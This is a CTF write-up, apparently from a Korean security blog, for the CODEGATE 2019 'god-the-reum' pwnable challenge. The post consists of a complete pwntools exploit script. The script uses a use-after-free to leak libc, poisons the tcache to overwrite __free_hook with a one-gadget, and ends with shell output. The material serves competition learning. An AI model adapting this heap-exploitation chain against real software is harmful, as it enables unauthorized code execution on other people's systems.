Category : pwnable
Summary : use-after-free, tcache, __free_hook
Exploit
#!/usr/bin/python
from pwn import *
def cmd_create(amount):
ru(': ')
sl(str(1))
ru(': ')
sl(str(amount))
def cmd_deposit(wallet_no, amount):
ru(': ')
sl(str(2))
ru(': ')
sl(str(wallet_no))
ru(': ')
sl(str(amount))
def cmd_withdraw(wallet_no, amount):
ru(': ')
sl(str(3))
ru(': ')
sl(str(wallet_no))
ru(': ')
sl(str(amount))
def cmd_show():
res = []
ru(': ')
sl(str(4))
ru('========== My Wallet List =============\n')
while 1:
line = rl(False)
if line == '':
break
res.append(int(line.split('ballance ')[1]))
return res
def cmd_new_eth(wallet_no, new_eth):
ru(': ')
sl(str(6))
ru(': ')
sl(str(wallet_no))
ru(': ')
sl(new_eth)
s = process('./god-the-reum')
#s = remote('110.10.147.103', 10001)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
cmd_create(0x420) # 0
cmd_create(0x50) # 1
cmd_withdraw(0, 0x420) # free
cmd_withdraw(1, 0x50) # free
libc_leak, _= cmd_show()
libc_base = libc_leak - 0x3ebca0
malloc_hook = libc_base + 0x3ebc30
free_hook = libc_base + 0x3ed8e8
libc_one_gadget = libc_base + 0xe569f
cmd_new_eth(1, p64(free_hook))
# (0x60) tcache_entry[4]: 0x5623649f77b0 --> 0x7f51275e38e8
cmd_create(0x50) # 2
cmd_create(0x50) # 3
cmd_new_eth(3, p64(libc_one_gadget))
cmd_withdraw(2, 0x50)
ru('withdraw? : ')
s.interactive()
s.close()$ python exploit.py
[+] Starting local process './god-the-reum': pid 2779
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)'CTF > 2019' 카테고리의 다른 글
| 0CTF 2019 - Fast&Furious (0) | 2019.07.21 |
|---|---|
| 0CTF 2019 - Fast&Furious2 (0) | 2019.07.21 |
| CODEGATE 2019 QUAL - cg_casino (1) | 2019.01.31 |
| CODEGATE 2019 QUAL - Maris_shop (0) | 2019.01.31 |
